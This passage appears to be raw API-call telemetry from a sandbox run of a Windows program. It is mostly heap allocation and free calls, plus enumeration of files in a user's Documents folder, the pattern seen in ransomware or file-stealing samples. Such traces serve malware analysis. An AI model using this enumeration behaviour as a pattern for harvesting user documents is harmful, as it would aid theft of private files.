| out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e08 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cf0 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dc0 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c90 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9da8 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d30 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c70 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c60 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ca0 | out: hHeap=0x8a0000) returned 1 [0157.312] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.312] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ca0 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c70 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c60 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a48 | out: hHeap=0x8a0000) returned 1 [0157.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d48 | out: hHeap=0x8a0000) returned 1 [0157.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d48 | out: hHeap=0x8a0000) returned 1 [0157.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6f0 | out: hHeap=0x8a0000) returned 1 [0157.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.313] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaa89f20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaa89f20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.313] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaa89f20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaa89f20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.355] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23f02910, ftCreationTime.dwHighDateTime=0x1d56e6d, ftLastAccessTime.dwLowDateTime=0x3f09d90, ftLastAccessTime.dwHighDateTime=0x1d58c84, ftLastWriteTime.dwLowDateTime=0x3f09d90, ftLastWriteTime.dwHighDateTime=0x1d58c84, nFileSizeHigh=0x0, nFileSizeLow=0xf77d, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="0-MFkGR.docx", cAlternateFileName="0-MFKG~1.DOC")) returned 1 [0157.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0157.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6f0 | out: hHeap=0x8a0000) returned 1 [0157.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5830 | out: hHeap=0x8a0000) returned 1 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.356] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.356] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae98 [0157.357] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.357] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8e2a80 [0157.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d50 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.359] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c1a880, ftCreationTime.dwHighDateTime=0x1d5e27d, ftLastAccessTime.dwLowDateTime=0xf76343c0, ftLastAccessTime.dwHighDateTime=0x1d57bc1, ftLastWriteTime.dwLowDateTime=0xf76343c0, ftLastWriteTime.dwHighDateTime=0x1d57bc1, nFileSizeHigh=0x0, nFileSizeLow=0x89e, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="6kBHfeDGIoa.pptx", cAlternateFileName="6KBHFE~1.PPT")) returned 1 [0157.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x8ee3c8 [0157.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.362] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.362] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d50 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.364] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.364] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: 